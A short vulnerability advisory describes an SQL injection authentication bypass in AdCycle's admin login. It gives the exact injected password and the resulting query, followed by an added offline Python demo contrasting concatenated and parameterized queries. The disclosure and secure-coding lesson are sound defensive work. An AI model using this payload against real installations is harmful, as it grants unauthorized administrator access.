AdCycle AdLogin.pm Admin Authentication Bypass Vulnerability

This example was submitted by qDefense Advisories <advisories@qDefense.com>:

If an attacker signs in, using an account name of "ADMIN" and a password of
X ' OR 1 #
an attacker can cause AdCycle to use the following SQL command:
SELECT * FROM ad WHERE LOGIN='ADMIN' AND PASSWORD='X' OR 1 #'
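The query above, built by string concatenation, next to a parameterized form that treats the same input as data. This is an added example, not AdCycle code or part of the qDefense submission. The sqlite3 in-memory database, the stored password, the function names, and the small helper that emulates MySQL's `#` comment are assumptions made so the example runs offline.

```python
import sqlite3

def strip_hash_comment(sql):
    """Emulate MySQL's '#' comment: drop everything from an unquoted '#' onward.
    SQLite has no '#' comment, so this stands in for the MySQL lexer (assumption)."""
    in_quote = False
    for i, ch in enumerate(sql):
        if ch == "'":
            in_quote = not in_quote
        elif ch == "#" and not in_quote:
            return sql[:i]
    return sql

def make_db():
    # Constructed stand-in for the "ad" table named in the query on this page.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE ad (LOGIN TEXT, PASSWORD TEXT)")
    db.execute("INSERT INTO ad VALUES ('ADMIN', 'constructed-secret')")
    return db

def build_concat_query(login, password):
    # Vulnerable pattern: user input is pasted between the quotes.
    return "SELECT * FROM ad WHERE LOGIN='%s' AND PASSWORD='%s'" % (login, password)

def login_concat(db, login, password):
    # AND binds tighter than OR, so the clause parses as
    # (LOGIN=... AND PASSWORD=...) OR 1, which is true for every row.
    sql = strip_hash_comment(build_concat_query(login, password))
    return db.execute(sql).fetchone() is not None

def login_param(db, login, password):
    # Hardened pattern: placeholders keep the quote and '#' inside the value.
    row = db.execute(
        "SELECT * FROM ad WHERE LOGIN=? AND PASSWORD=?", (login, password)
    ).fetchone()
    return row is not None

if __name__ == "__main__":
    db = make_db()
    supplied = "X' OR 1 #"  # password value that yields the query shown above
    print(build_concat_query("ADMIN", supplied))
    print("concatenated query accepts login:", login_concat(db, "ADMIN", supplied))
    print("parameterized query accepts login:", login_param(db, "ADMIN", supplied))
```

With the concatenated query the login succeeds without the stored password; with placeholders the same input matches no row.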


 

Copyright 2010, SecurityFocus